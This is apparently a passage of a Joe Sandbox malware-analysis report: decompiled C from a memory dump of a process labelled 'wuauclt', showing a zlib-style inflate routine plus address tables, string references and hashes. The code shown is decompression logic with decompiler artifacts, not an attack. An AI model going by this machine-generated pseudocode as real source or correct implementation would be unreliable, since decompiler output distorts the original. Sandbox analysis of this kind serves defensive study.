                                                				signed int* _t298;
                                                				signed char _t337;
                                                				intOrPtr _t343;
                                                				intOrPtr _t345;
                                                				signed int _t346;
                                                				intOrPtr _t387;
                                                				signed int _t393;
                                                				intOrPtr _t394;
                                                				void* _t395;
                                                				void* _t396;
                                                
                                                				_t394 =  *((intOrPtr*)(_t396 + 0x20));
                                                				_t393 =  *(_t396 + 0x28);
                                                				_t298 =  *(_t394 + 4);
                                                				_t395 =  *_t393;
                                                				_t337 =  *(_t394 + 0x1c);
                                                				 *(_t396 + 0x28) =  *(_t393 + 4);
                                                				_t343 =  *((intOrPtr*)(_t394 + 0x30));
                                                				 *(_t396 + 0x24) =  *(_t394 + 0x20);
                                                				_t387 =  *((intOrPtr*)(_t394 + 0x34));
                                                				 *(_t396 + 0x10) = _t298;
                                                				if(_t387 >= _t343) {
                                                					_t345 =  *((intOrPtr*)(_t394 + 0x2c)) - _t387;
                                                				} else {
                                                					_t345 = _t343 - _t387 - 1;
                                                				}
                                                				 *((intOrPtr*)(_t396 + 0x14)) = _t345;
                                                				while(1) {
                                                					L4:
                                                					_t346 =  *_t298;
                                                					if(_t346 > 9) {
                                                						break;
                                                					}
                                                					switch( *((intOrPtr*)(_t346 * 4 +  &M00252E30))) {
                                                						case 0:
                                                							if( *((intOrPtr*)(_t396 + 0x14)) < 0x102 ||  *(_t396 + 0x28) < 0xa) {
                                                								L13:
                                                								_t303 =  *(_t396 + 0x10);
                                                								 *_t303 = 1;
                                                								_t303[3] = 0;
                                                								_t303[2] = _t303[5];
                                                								goto L14;
                                                							} else {
                                                								 *(_t394 + 0x20) =  *(_t396 + 0x24);
                                                								 *(_t394 + 0x1c) = _t337;
                                                								 *(_t393 + 4) =  *(_t396 + 0x28);
                                                								 *_t393 = _t395;
                                                								_t331 =  *(_t396 + 0x10);
                                                								 *((intOrPtr*)(_t393 + 8)) =  *((intOrPtr*)(_t393 + 8)) + _t395 -  *_t393;
                                                								 *((intOrPtr*)(_t394 + 0x34)) = _t387;
                                                								_push(_t393);
                                                								_push(_t394);
                                                								_push(_t331[6]);
                                                								_push(_t331[5]);
                                                								_push(0);
                                                								_push(0);
                                                								_t332 = E002536F0();
                                                								_t395 =  *_t393;
                                                								_t337 =  *(_t394 + 0x1c);
                                                								 *(_t396 + 0x40) =  *(_t393 + 4);
                                                								_t380 =  *((intOrPtr*)(_t394 + 0x30));
                                                								 *(_t396 + 0x3c) =  *(_t394 + 0x20);
                                                								_t387 =  *((intOrPtr*)(_t394 + 0x34));
                                                								_t396 = _t396 + 0x18;
                                                								 *(_t396 + 0x2c) = _t332;
                                                								if(_t387 >= _t380) {
                                                									_t382 =  *((intOrPtr*)(_t394 + 0x2c)) - _t387;
                                                								} else {
                                                									_t382 = _t380 - _t387 - 1;
                                                								}
                                                								 *((intOrPtr*)(_t396 + 0x14)) = _t382;
                                                								if(_t332 == 0) {
                                                									goto L13;
                                                								} else {
                                                									_t383 =  *(_t396 + 0x10);
                                                									asm("sbb eax, eax");
                                                									 *_t383 = ( ~(_t332 - 1) & 0x00000002) + 7;
                                                									_t298 = _t383;
                                                									goto L4;
                                                								}
                                                							}
                                                							goto L100;
                                                						case 1:
                                                							L14:
                                                							_t304 = _t303[3];
                                                							 *(_t396 + 0x18) = _t304;
                                                							if(_t337 >= _t304) {
                                                								L17:
                                                								_t308 = ( *(_t396 + 0x10))[2] + ( *(0x2723c8 + _t304 * 4) &  *(_t396 + 0x24)) * 8;
                                                								 *(_t396 + 0x18) = _t308;
                                                								 *((intOrPtr*)(_t396 + 0x1c)) = 0;
                                                								 *(_t396 + 0x24) =  *(_t396 + 0x24) >>  *(_t308 + 1);
                                                								_t337 = _t337;
                                                								_t312 =  *(_t396 + 0x18);
                                                								_t358 =  *_t312;
                                                								if(0 != 0) {
                                                									if((_t358 & 0x00000010) == 0) {
                                                										if((_t358 & 0x00000040) != 0) {
                                                											_t298 =  *(_t396 + 0x10);
                                                											if((_t358 & 0x00000020) == 0) {
                                                												 *_t298 = 9;
                                                												 *(_t393 + 0x18) = "invalid literal/length code";
                                                												goto L90;
                                                											} else {
                                                												 *_t298 = 7;
                                                												goto L4;
                                                											}
                                                										} else {
                                                											goto L22;
                                                										}
                                                									} else {
                                                										_t298 =  *(_t396 + 0x10);
                                                										_t298[2] = 0;
                                                										 *_t298 = 2;
                                                										_t298[1] =  *( *(_t396 + 0x18) + 4);
                                                										goto L4;
                                                									}
                                                								} else {
                                                									_t298 =  *(_t396 + 0x10);
                                                									_t298[2] =  *(_t312 + 4);
                                                									 *_t298 = 6;
                                                									goto L4;
                                                								}
                                                							} else {
                                                								while(1) {
                                                									_t319 =  *(_t396 + 0x28);
                                                									if(_t319 == 0) {
                                                										goto L88;
                                                									}
                                                									_t370 = _t337;
                                                									 *(_t396 + 0x28) = _t319 - 1;
                                                									_t337 = _t337 + 8;
                                                									 *(_t396 + 0x2c) = 0;
                                                									_t304 =  *(_t396 + 0x18);
                                                									_t395 = _t395 + 1;
                                                									 *(_t396 + 0x24) =  *(_t396 + 0x24) | 0 << _t370;
                                                									if(_t337 < _t304) {
                                                										continue;
                                                									} else {
                                                										goto L17;
                                                									}
                                                									goto L100;
                                                								}
                                                								goto L88;
                                                							}
                                                							goto L100;
                                                						case 2:
                                                							__eax =  *(__eax + 8);
                                                							 *(__esp + 0x18) = __eax;
                                                							if(__ebx >= __eax) {
                                                								L28:
                                                								__ecx =  *(0x2723c8 + __eax * 4);
                                                								__eax =  *(__esp + 0x24);
                                                								__ecx = __ecx &  *(__esp + 0x24);
                                                								__eax =  *(__esp + 0x10);
                                                								 *((intOrPtr*)( *(__esp + 0x10) + 4)) =  *((intOrPtr*)( *(__esp + 0x10) + 4)) + __ecx;
                                                								__ecx =  *(__esp + 0x18);
                                                								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
                                                								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
                                                								__eax =  *(__esp + 0x18);
                                                								__ebx = __ebx -  *(__esp + 0x18);
                                                								__eax =  *(__esp + 0x10);
                                                								__ecx = 0;
                                                								__cl =  *((intOrPtr*)(__eax + 0x11));
                                                								 *__eax = 3;
                                                								 *(__eax + 0xc) = 0;
                                                								__ecx =  *(__eax + 0x18);
                                                								 *(__eax + 8) =  *(__eax + 0x18);
                                                								goto L29;
                                                							} else {
                                                								while(1) {
                                                									__eax =  *(__esp + 0x28);
                                                									if(__eax == 0) {
                                                										goto L88;
                                                									}
                                                									__eax = __eax - 1;
                                                									__ecx = __ebx;
                                                									 *(__esp + 0x28) = __eax;
                                                									__eax = 0;
                                                									__ebx = __ebx + 8;
                                                									__eax = 0 << __cl;
                                                									__ecx =  *(__esp + 0x24);
                                                									 *(__esp + 0x2c) = 0;
                                                									__ecx =  *(__esp + 0x24) | 0 << __cl;
                                                									__eax =  *(__esp + 0x18);
                                                									__ebp = __ebp + 1;
                                                									 *(__esp + 0x24) =  *(__esp + 0x24) | 0 << __cl;
                                                									if(__ebx < __eax) {
                                                										continue;
                                                									} else {
                                                										goto L28;
                                                									}
                                                									goto L100;
                                                								}
                                                								goto L88;
                                                							}
                                                							goto L100;
                                                						case 3:
                                                							L29:
                                                							__eax =  *(__eax + 0xc);
                                                							 *(__esp + 0x18) = __eax;
                                                							if(__ebx >= __eax) {
                                                								L32:
                                                								__ecx =  *(0x2723c8 + __eax * 4);
                                                								__eax =  *(__esp + 0x24);
                                                								__ecx = __ecx &  *(__esp + 0x24);
                                                								 *(__esp + 0x10) =  *( *(__esp + 0x10) + 8);
                                                								__eax =  *( *(__esp + 0x10) + 8) + __ecx * 8;
                                                								__ecx = 0;
                                                								 *(__esp + 0x18) = __eax;
                                                								__cl =  *((intOrPtr*)(__eax + 1));
                                                								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
                                                								 *(__esp + 0x1c) = 0;
                                                								__ebx = __ebx;
                                                								__ecx = 0;
                                                								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
                                                								__eax =  *(__esp + 0x18);
                                                								__cl =  *__eax;
                                                								if((__cl & 0x00000010) == 0) {
                                                									if((__cl & 0x00000040) != 0) {
                                                										__eax =  *(__esp + 0x10);
                                                										 *( *(__esp + 0x10)) = 9;
                                                										__edi[6] = "invalid distance code";
                                                										L90:
                                                										 *(_t394 + 0x20) =  *(_t396 + 0x24);
                                                										 *(_t394 + 0x1c) = _t337;
                                                										 *(_t393 + 4) =  *(_t396 + 0x28);
                                                										 *((intOrPtr*)(_t393 + 8)) =  *((intOrPtr*)(_t393 + 8)) + _t395 -  *_t393;
                                                										 *_t393 = _t395;
                                                										 *((intOrPtr*)(_t394 + 0x34)) = _t387;
                                                										return E002535B0(_t394, _t393, 0xfffffffd);
                                                									} else {
                                                										L22:
                                                										( *(_t396 + 0x10))[3] = _t358;
                                                										_t318 =  *(_t396 + 0x18);
                                                										_t298 =  *(_t396 + 0x10);
                                                										_t298[2] =  *(_t396 + 0x18) +  *(_t318 + 4) * 8;
                                                										goto L4;
                                                									}
                                                								} else {
                                                									__eax =  *(__esp + 0x10);
                                                									__ecx = 0;
                                                									 *(__eax + 8) = 0;
                                                									 *(__esp + 0x18) =  *( *(__esp + 0x18) + 4);
                                                									 *__eax = 4;
                                                									 *(__eax + 0xc) =  *( *(__esp + 0x18) + 4);
                                                									goto L4;
                                                								}
                                                							} else {
                                                								while(1) {
                                                									__eax =  *(__esp + 0x28);
                                                									if(__eax == 0) {
                                                										goto L88;
                                                									}
                                                									__eax = __eax - 1;
                                                									__ecx = __ebx;
                                                									 *(__esp + 0x28) = __eax;
                                                									__eax = 0;
                                                									__ebx = __ebx + 8;
                                                									__eax = 0 << __cl;
                                                									__ecx =  *(__esp + 0x24);
                                                									 *(__esp + 0x2c) = 0;
                                                									__ecx =  *(__esp + 0x24) | 0 << __cl;
                                                									__eax =  *(__esp + 0x18);
                                                									__ebp = __ebp + 1;
                                                									 *(__esp + 0x24) =  *(__esp + 0x24) | 0 << __cl;
                                                									if(__ebx < __eax) {
                                                										continue;
                                                									} else {
                                                										goto L32;
                                                									}
                                                									goto L100;
                                                								}
                                                								goto L88;
                                                							}
                                                							goto L100;
                                                						case 4:
                                                							__eax =  *(__eax + 8);
                                                							 *(__esp + 0x18) = __eax;
                                                							if(__ebx >= __eax) {
                                                								L39:
                                                								__ecx =  *(0x2723c8 + __eax * 4);
                                                								__eax =  *(__esp + 0x24);
                                                								__ecx = __ecx &  *(__esp + 0x24);
                                                								__eax =  *(__esp + 0x10);
                                                								 *((intOrPtr*)( *(__esp + 0x10) + 0xc)) =  *((intOrPtr*)( *(__esp + 0x10) + 0xc)) + __ecx;
                                                								__ecx =  *(__esp + 0x18);
                                                								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
                                                								 *(__esp + 0x24) =  *(__esp + 0x24) >> __cl;
                                                								__eax =  *(__esp + 0x18);
                                                								__ebx = __ebx -  *(__esp + 0x18);
                                                								__eax =  *(__esp + 0x10);
                                                								 *__eax = 5;
                                                								goto L40;
                                                							} else {
                                                								while(1) {
                                                									__eax =  *(__esp + 0x28);
                                                									if(__eax == 0) {
                                                										break;
                                                									}
                                                									__eax = __eax - 1;
                                                									__ecx = __ebx;
                                                									 *(__esp + 0x28) = __eax;
                                                									__eax = 0;
                                                									__ebx = __ebx + 8;
                                                									__eax = 0 << __cl;
                                                									__ecx =  *(__esp + 0x24);
                                                									 *(__esp + 0x2c) = 0;
                                                									__ecx =  *(__esp + 0x24) | 0 << __cl;
                                                									__eax =  *(__esp + 0x18);
                                                									__ebp = __ebp + 1;
                                                									 *(__esp + 0x24) =  *(__esp + 0x24) | 0 << __cl;
                                                									if(__ebx < __eax) {
                                                										continue;
                                                									} else {
                                                										goto L39;
                                                									}
                                                									goto L100;
                                                								}
                                                								L88:
                                                								 *(_t394 + 0x1c) = _t337;
                                                								 *(_t394 + 0x20) =  *(_t396 + 0x24);
                                                								 *(_t393 + 4) = 0;
                                                								 *_t393 = _t395;
                                                								 *((intOrPtr*)(_t393 + 8)) =  *((intOrPtr*)(_t393 + 8)) + _t395 -  *_t393;
                                                								 *((intOrPtr*)(_t394 + 0x34)) = _t387;
                                                								return E002535B0(_t394, _t393,  *(_t396 + 0x2c));
                                                							}
                                                							goto L100;
                                                						case 5:
                                                							L40:
                                                							__ecx = __edx;
                                                							__ecx = __edx -  *(__eax + 0xc);
                                                							__eax =  *(__esi + 0x28);
                                                							 *(__esp + 0x18) = __ecx;
                                                							if(__ecx < __eax) {
                                                								__ecx =  *(__esi + 0x2c);
                                                								__ecx =  *(__esi + 0x2c) - __eax;
                                                								__eax =  *(__esp + 0x18);
                                                								 *(__esp + 0x1c) = __ecx;
                                                								while(1) {
                                                									__eax = __eax + __ecx;
                                                									__ecx =  *(__esi + 0x28);
                                                									if(__eax >=  *(__esi + 0x28)) {
                                                										break;
                                                									}
                                                									__ecx =  *(__esp + 0x1c);
                                                								}
                                                								 *(__esp + 0x18) = __eax;
                                                							}
                                                							__eax =  *(__esp + 0x10);
                                                							__ecx =  *(__eax + 4);
                                                							if( *(__eax + 4) == 0) {
                                                								L67:
                                                								 *__eax = 0;
                                                								goto L4;
                                                							} else {
                                                								do {
                                                									__ecx =  *(__esp + 0x14);
                                                									if( *(__esp + 0x14) != 0) {
                                                										goto L64;
                                                									} else {
                                                										__eax =  *(__esi + 0x2c);
                                                										 *(__esp + 0x1c) = __eax;
                                                										if(__edx != __eax) {
                                                											L53:
                                                											 *(__esi + 0x34) = __edx;
                                                											__edx =  *(__esp + 0x2c);
                                                											__eax = E002535B0(__esi, __edi,  *(__esp + 0x2c));
                                                											__edx =  *(__esi + 0x34);
                                                											 *(__esp + 0x38) = __eax;
                                                											__eax =  *(__esi + 0x30);
                                                											if(__edx >= __eax) {
                                                												__ecx =  *(__esi + 0x2c);
                                                												__ecx =  *(__esi + 0x2c) - __edx;
                                                											} else {
                                                												__eax = __eax - __edx;
                                                												__ecx = __eax - __edx - 1;
                                                											}
                                                											 *(__esp + 0x14) = __ecx;
                                                											__ecx =  *(__esi + 0x2c);
                                                											 *(__esp + 0x1c) = __ecx;
                                                											if(__edx == __ecx) {
                                                												__ecx =  *(__esi + 0x28);
                                                												if(__eax != __ecx) {
                                                													__edx = __ecx;
                                                													if(__edx >= __eax) {
                                                														__eax =  *(__esp + 0x1c);
                                                														__eax =  *(__esp + 0x1c) - __edx;
                                                													} else {
                                                														__eax = __eax - __edx;
                                                														__eax = __eax - 1;
                                                													}
                                                													 *(__esp + 0x14) = __eax;
                                                												}
                                                											}
                                                											__eax =  *(__esp + 0x14);
                                                											if( *(__esp + 0x14) == 0) {
                                                												goto L91;
                                                											} else {
                                                												goto L63;
                                                											}
                                                										} else {
                                                											__eax =  *(__esi + 0x30);
                                                											__ecx =  *(__esi + 0x28);
                                                											if(__eax == __ecx) {
                                                												goto L53;
                                                											} else {
                                                												__edx = __ecx;
                                                												if(__edx >= __eax) {
                                                													__eax =  *(__esp + 0x1c);
                                                													__eax =  *(__esp + 0x1c) - __edx;
                                                												} else {
                                                													__eax = __eax - __edx;
                                                													__eax = __eax - 1;
                                                												}
                                                												 *(__esp + 0x14) = __eax;
                                                												if(__eax != 0) {
                                                													L63:
                                                													__eax =  *(__esp + 0x10);
                                                													goto L64;
                                                												} else {
                                                													goto L53;
                                                												}
                                                											}
                                                										}
                                                									}
                                                									goto L100;
                                                									L64:
                                                									__ecx =  *(__esp + 0x18);
                                                									__edx = __edx + 1;
                                                									 *(__esp + 0x2c) = 0;
                                                									__cl =  *( *(__esp + 0x18));
                                                									 *(__edx - 1) = __cl;
                                                									 *(__esp + 0x18) =  *(__esp + 0x18) + 1;
                                                									 *(__esp + 0x18) =  *(__esp + 0x18) + 1;
                                                									 *(__esp + 0x14) =  *(__esp + 0x14) - 1;
                                                									 *(__esp + 0x14) =  *(__esp + 0x14) - 1;
                                                									__ecx =  *(__esp + 0x18);
                                                									if( *(__esp + 0x18) ==  *(__esi + 0x2c)) {
                                                										__ecx =  *(__esi + 0x28);
                                                										 *(__esp + 0x18) =  *(__esi + 0x28);
                                                									}
                                                									__ecx =  *(__eax + 4);
                                                									__ecx =  *(__eax + 4) - 1;
                                                									 *(__eax + 4) = __ecx;
                                                								} while (__ecx != 0);
                                                								goto L67;
                                                							}
                                                							goto L100;
                                                						case 6:
                                                							__ecx =  *(__esp + 0x14);
                                                							if( *(__esp + 0x14) != 0) {
                                                								L86:
                                                								__cl =  *(__eax + 8);
                                                								 *(__esp + 0x2c) = 0;
                                                								 *__edx = __cl;
                                                								__ecx =  *(__esp + 0x14);
                                                								__edx = __edx + 1;
                                                								__ecx =  *(__esp + 0x14) - 1;
                                                								 *(__esp + 0x14) =  *(__esp + 0x14) - 1;
                                                								 *__eax = 0;
                                                								goto L4;
                                                							} else {
                                                								__eax =  *(__esi + 0x2c);
                                                								 *(__esp + 0x1c) = __eax;
                                                								if(__edx != __eax) {
                                                									L75:
                                                									 *(__esi + 0x34) = __edx;
                                                									__edx =  *(__esp + 0x2c);
                                                									__eax = E002535B0(__esi, __edi,  *(__esp + 0x2c));
                                                									__edx =  *(__esi + 0x34);
                                                									 *(__esp + 0x38) = __eax;
                                                									__eax =  *(__esi + 0x30);
                                                									if(__edx >= __eax) {
                                                										__ecx =  *(__esi + 0x2c);
                                                										__ecx =  *(__esi + 0x2c) - __edx;
                                                									} else {
                                                										__eax = __eax - __edx;
                                                										__ecx = __eax - __edx - 1;
                                                									}
                                                									 *(__esp + 0x14) = __ecx;
                                                									__ecx =  *(__esi + 0x2c);
                                                									 *(__esp + 0x1c) = __ecx;
                                                									if(__edx == __ecx) {
                                                										__ecx =  *(__esi + 0x28);
                                                										if(__eax != __ecx) {
                                                											__edx = __ecx;
                                                											if(__edx >= __eax) {
                                                												__eax =  *(__esp + 0x1c);
                                                												__eax =  *(__esp + 0x1c) - __edx;
                                                											} else {
                                                												__eax = __eax - __edx;
                                                												__eax = __eax - 1;
                                                											}
                                                											 *(__esp + 0x14) = __eax;
                                                										}
                                                									}
                                                									__eax =  *(__esp + 0x14);
                                                									if( *(__esp + 0x14) == 0) {
                                                										L91:
                                                										__eax =  *(__esp + 0x24);
                                                										__ecx =  *(__esp + 0x28);
                                                										 *(__esi + 0x20) =  *(__esp + 0x24);
                                                										 *(__esi + 0x1c) = __ebx;
                                                										__ebx =  *__edi;
                                                										__eax = __ebp;
                                                										__edi[1] =  *(__esp + 0x28);
                                                										__ecx = __edi[2];
                                                										__eax = __ebp -  *__edi;
                                                										 *__edi = __ebp;
                                                										__ecx = __edi[2] + __ebp -  *__edi;
                                                										__edi[2] = __edi[2] + __ebp -  *__edi;
                                                										__ecx =  *(__esp + 0x2c);
                                                										 *(__esi + 0x34) = __edx;
                                                										return E002535B0(__esi, __edi,  *(__esp + 0x2c));
                                                									} else {
                                                										goto L85;
                                                									}
                                                								} else {
                                                									__eax =  *(__esi + 0x30);
                                                									__ecx =  *(__esi + 0x28);
                                                									if(__eax == __ecx) {
                                                										goto L75;
                                                									} else {
                                                										__edx = __ecx;
                                                										if(__edx >= __eax) {
                                                											__eax =  *(__esp + 0x1c);
                                                											__eax =  *(__esp + 0x1c) - __edx;
                                                										} else {
                                                											__eax = __eax - __edx;
                                                											__eax = __eax - 1;
                                                										}
                                                										 *(__esp + 0x14) = __eax;
                                                										if(__eax != 0) {
                                                											L85:
                                                											__eax =  *(__esp + 0x10);
                                                											goto L86;
                                                										} else {
                                                											goto L75;
                                                										}
                                                									}
                                                								}
                                                							}
                                                							goto L100;
                                                						case 7:
                                                							if(__ebx > 7) {
                                                								__ecx =  *(__esp + 0x28);
                                                								__ebx = __ebx - 8;
                                                								__ecx =  *(__esp + 0x28) + 1;
                                                								__ebp = __ebp - 1;
                                                								 *(__esp + 0x28) =  *(__esp + 0x28) + 1;
                                                							}
                                                							 *(__esi + 0x34) = __edx;
                                                							__edx =  *(__esp + 0x2c);
                                                							__eax = E002535B0(__esi, __edi,  *(__esp + 0x2c));
                                                							__edx =  *(__esi + 0x34);
                                                							__ecx =  *(__esi + 0x30);
                                                							if( *(__esi + 0x30) == __edx) {
                                                								__eax =  *(__esp + 0x10);
                                                								 *( *(__esp + 0x10)) = 8;
                                                								goto L97;
                                                							} else {
                                                								__ecx =  *(__esp + 0x24);
                                                								 *(__esi + 0x1c) = __ebx;
                                                								 *(__esi + 0x20) =  *(__esp + 0x24);
                                                								__ecx =  *(__esp + 0x28);
                                                								__ebx =  *__edi;
                                                								__edi[1] =  *(__esp + 0x28);
                                                								__ebp = __ebp -  *__edi;
                                                								__edi[2] = __edi[2] + __ebp -  *__edi;
                                                								__edi[2] = __edi[2] + __ebp -  *__edi;
                                                								 *__edi = __ebp;
                                                								 *(__esi + 0x34) = __edx;
                                                								return __eax;
                                                							}
                                                							goto L100;
                                                						case 8:
                                                							L97:
                                                							__ecx =  *(__esp + 0x24);
                                                							__eax =  *(__esp + 0x28);
                                                							 *(__esi + 0x20) =  *(__esp + 0x24);
                                                							 *(__esi + 0x1c) = __ebx;
                                                							__ebx =  *__edi;
                                                							__ecx = __ebp;
                                                							__edi[1] =  *(__esp + 0x28);
                                                							__eax = __edi[2];
                                                							__ecx = __ebp -  *__edi;
                                                							__eax = __edi[2] + __ebp -  *__edi;
                                                							__edi[2] = __edi[2] + __ebp -  *__edi;
                                                							 *__edi = __ebp;
                                                							 *(__esi + 0x34) = __edx;
                                                							return E002535B0(__esi, __edi, 1);
                                                							goto L100;
                                                						case 9:
                                                							__eax =  *(__esp + 0x24);
                                                							__ecx =  *(__esp + 0x28);
                                                							 *(__esi + 0x20) =  *(__esp + 0x24);
                                                							 *(__esi + 0x1c) = __ebx;
                                                							__ebx =  *__edi;
                                                							__eax = __ebp;
                                                							__edi[1] =  *(__esp + 0x28);
                                                							__ecx = __edi[2];
                                                							__eax = __ebp -  *__edi;
                                                							__ecx = __edi[2] + __ebp -  *__edi;
                                                							__edi[2] = __edi[2] + __ebp -  *__edi;
                                                							 *__edi = __ebp;
                                                							 *(__esi + 0x34) = __edx;
                                                							return E002535B0(__esi, __edi, 0xfffffffd);
                                                							L100:
                                                					}
                                                				}
                                                				 *(_t394 + 0x20) =  *(_t396 + 0x24);
                                                				 *(_t394 + 0x1c) = _t337;
                                                				 *(_t393 + 4) =  *(_t396 + 0x28);
                                                				 *((intOrPtr*)(_t393 + 8)) =  *((intOrPtr*)(_t393 + 8)) + _t395 -  *_t393;
                                                				 *_t393 = _t395;
                                                				 *((intOrPtr*)(_t394 + 0x34)) = _t387;
                                                				return E002535B0(_t394, _t393, 0xfffffffe);
                                                				goto L100;
                                                			}













                                                0x00252d04
                                                0x00252d16
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00252b9d
                                                0x00252b9d
                                                0x00252ba0
                                                0x00252ba5
                                                0x00000000
                                                0x00252ba7
                                                0x00252ba7
                                                0x00252bab
                                                0x00252bb2
                                                0x00252bb6
                                                0x00252bad
                                                0x00252bad
                                                0x00252baf
                                                0x00252baf
                                                0x00252bba
                                                0x00252bbe
                                                0x00252c23
                                                0x00252c23
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00252bbe
                                                0x00252ba5
                                                0x00252b9b
                                                0x00000000
                                                0x00000000
                                                0x00252d1a
                                                0x00252d1c
                                                0x00252d20
                                                0x00252d23
                                                0x00252d24
                                                0x00252d25
                                                0x00252d25
                                                0x00252d29
                                                0x00252d2c
                                                0x00252d33
                                                0x00252d38
                                                0x00252d3b
                                                0x00252d43
                                                0x00252d7c
                                                0x00252d80
                                                0x00000000
                                                0x00252d45
                                                0x00252d45
                                                0x00252d49
                                                0x00252d4c
                                                0x00252d4f
                                                0x00252d53
                                                0x00252d55
                                                0x00252d5b
                                                0x00252d60
                                                0x00252d63
                                                0x00252d66
                                                0x00252d69
                                                0x00252d7b
                                                0x00252d7b
                                                0x00000000
                                                0x00000000
                                                0x00252d86
                                                0x00252d86
                                                0x00252d8a
                                                0x00252d8e
                                                0x00252d91
                                                0x00252d94
                                                0x00252d96
                                                0x00252d98
                                                0x00252d9b
                                                0x00252d9e
                                                0x00252da2
                                                0x00252da5
                                                0x00252da8
                                                0x00252dab
                                                0x00252dbd
                                                0x00000000
                                                0x00000000
                                                0x00252dbe
                                                0x00252dc2
                                                0x00252dc6
                                                0x00252dc9
                                                0x00252dcc
                                                0x00252dce
                                                0x00252dd0
                                                0x00252dd3
                                                0x00252dd6
                                                0x00252dda
                                                0x00252ddd
                                                0x00252de0
                                                0x00252de3
                                                0x00252df5
                                                0x00000000
                                                0x00000000
                                                0x002526fc
                                                0x00252dfe
                                                0x00252e01
                                                0x00252e08
                                                0x00252e15
                                                0x00252e18
                                                0x00252e1b
                                                0x00252e2d
                                                0x00000000

                                                Strings
                                                • invalid literal/length code, xrefs: 00252C4F
                                                • invalid distance code, xrefs: 00252C9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: invalid distance code$invalid literal/length code
                                                • API String ID: 0-1393003055
                                                • Opcode ID: 21669172a4bd0762496f2a3f0aabb4b2e5a741d4b3cd96349c8496d998f70c4b
                                                • Instruction ID: 1d7b22b16105239adfe6ad5d48bca13774ba9b59c490396d9fd501045afd7edc
                                                • Opcode Fuzzy Hash: 21669172a4bd0762496f2a3f0aabb4b2e5a741d4b3cd96349c8496d998f70c4b
                                                • Instruction Fuzzy Hash: 031229B4618302CFC708CF29D594A2ABBE1FB89315F14896DE88AC7791D730E958CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E002536F0() {
                                                				signed int _t153;
                                                				unsigned int _t155;
                                                				unsigned int _t161;
                                                				signed char _t173;
                                                				signed int _t176;
                                                				intOrPtr _t177;
                                                				signed int _t178;
                                                				signed char _t180;
                                                				signed int _t181;
                                                				intOrPtr _t182;
                                                				intOrPtr _t193;
                                                				signed int _t200;
                                                				intOrPtr _t201;
                                                				signed int _t204;
                                                				signed int _t212;
                                                				signed int _t219;
                                                				signed int _t235;
                                                				signed int _t240;
                                                				void* _t241;
                                                				void* _t242;
                                                				void* _t243;
                                                				intOrPtr* _t249;
                                                				signed int _t252;
                                                				signed int _t261;
                                                				signed int _t267;
                                                				unsigned int _t270;
                                                				unsigned int _t273;
                                                				char* _t279;
                                                				char* _t280;
                                                				char* _t281;
                                                				char* _t282;
                                                				char* _t283;
                                                				intOrPtr _t284;
                                                				intOrPtr _t285;
                                                				void* _t286;
                                                				intOrPtr* _t287;
                                                				signed int _t289;
                                                				intOrPtr _t290;
                                                				void* _t291;
                                                				intOrPtr* _t295;
                                                				intOrPtr* _t297;
                                                				intOrPtr* _t299;
                                                				intOrPtr* _t301;
                                                				signed int _t305;
                                                				signed int _t309;
                                                				intOrPtr* _t313;
                                                				intOrPtr _t317;
                                                				void* _t320;
                                                				intOrPtr _t321;
                                                				signed int _t323;
                                                				intOrPtr _t325;
                                                				intOrPtr _t326;
                                                				signed int _t327;
                                                				void* _t328;
                                                				void* _t330;
                                                				void* _t331;
                                                
                                                				_t153 =  *(_t331 + 0x2c);
                                                				_t204 =  *(_t331 + 0x28);
                                                				_t316 =  *_t153;
                                                				_t270 =  *(_t204 + 0x20);
                                                				_t284 =  *((intOrPtr*)(_t204 + 0x30));
                                                				_t279 =  *((intOrPtr*)(_t204 + 0x34));
                                                				 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t153 + 4));
                                                				_t155 =  *(_t204 + 0x1c);
                                                				 *((intOrPtr*)(_t331 + 0x18)) = _t316;
                                                				if(_t279 >= _t284) {
                                                					 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t204 + 0x2c)) - _t279;
                                                				} else {
                                                					 *((intOrPtr*)(_t331 + 0x14)) = _t284 - _t279 - 1;
                                                				}
                                                				 *(_t331 + 0x1c) =  *(0x2723c8 +  *(_t331 + 0x28) * 4);
                                                				 *(_t331 + 0x20) =  *(0x2723c8 +  *(_t331 + 0x2c) * 4);
                                                				L4:
                                                				while(1) {
                                                					if(_t155 < 0x14) {
                                                						do {
                                                							 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
                                                							_t289 = 0 << _t155;
                                                							_t155 = _t155 + 8;
                                                							_t270 = _t270 | _t289;
                                                							_t316 = _t316 + 1;
                                                						} while (_t155 < 0x14);
                                                						 *((intOrPtr*)(_t331 + 0x18)) = _t316;
                                                					}
                                                					_t285 =  *((intOrPtr*)(_t331 + 0x30));
                                                					_t212 =  *(_t331 + 0x1c) & _t270;
                                                					_t173 =  *((intOrPtr*)(_t285 + _t212 * 8));
                                                					_t286 = _t285 + _t212 * 8;
                                                					if(0 == 0) {
                                                						L35:
                                                						_t270 = _t270 >>  *(_t286 + 1);
                                                						_t155 = _t155;
                                                						 *_t279 =  *((intOrPtr*)(_t286 + 4));
                                                						_t279 = _t279 + 1;
                                                						 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - 1;
                                                						goto L36;
                                                					} else {
                                                						_t270 = _t270 >>  *(_t286 + 1);
